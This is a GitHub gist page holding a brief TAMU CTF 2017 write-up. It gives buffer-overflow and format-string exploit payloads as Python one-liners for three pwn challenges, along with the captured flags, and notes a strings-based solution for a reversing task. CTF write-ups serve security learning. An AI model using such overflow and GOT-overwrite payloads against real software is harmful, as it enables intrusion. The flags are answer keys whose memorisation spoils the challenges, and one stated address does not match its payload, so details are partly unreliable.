parksjin01/Tamu 2017 writeup.md

Created April 22, 2017 04:01

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/parksjin01/e8c3895dbb22236d255f8a90cf35d9a2.js"></script>
Save parksjin01/e8c3895dbb22236d255f8a90cf35d9a2 to your computer and use it in GitHub Desktop.

Download ZIP

Tamu 2017 writeup

Raw

Tamu 2017 writeup.md

pwn1

It's really easy and simple buffer overflow problem.
Just input 27 dumy letters and input \x1e\xab\x11\xca
Payload: (python -c 'print "aaaaaaaaaaaaaaaaaaaaaaaaaaa"+"\x1e\xab\x11\xca"';cat)
flag: gigem{T00_435Y}
bin is at here

pwn2

Also, it's really easy and simple buffer overflow problem.
Input 0x8c dummy letters and input address of print_flag function(0x08048548)
Payload: (python -c 'print "a"*0x8c+"\x4b\x85\x04\x08"';cat)
flag: gigem{D34D_FUNC_R1S1NG}
bin is at here

pwn3

I can't understand the gap of difficulty between pwn2 and pwn3.
Anyway to solve this problem we have to use fsb and change exit got area to print_flag function address(0x08048548)
Payload: (python -c 'print "a"*32+"\x1e\xa0\x04\x08"*2+"\x1c\xa0\x04\x08"*2+"%10x"*10+"%1904c"+"%n"+"%32167c"+"%hn"')>input
flag: gigem{F0RM@1NG_1S_H4RD}
bin is at here

threads1

It's easy if you know about strings command.
Use string command to file we can find flag
flag: gigem{stringy_lasagna_fe7ed6f4c428f59d}
bin is at here

threads2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment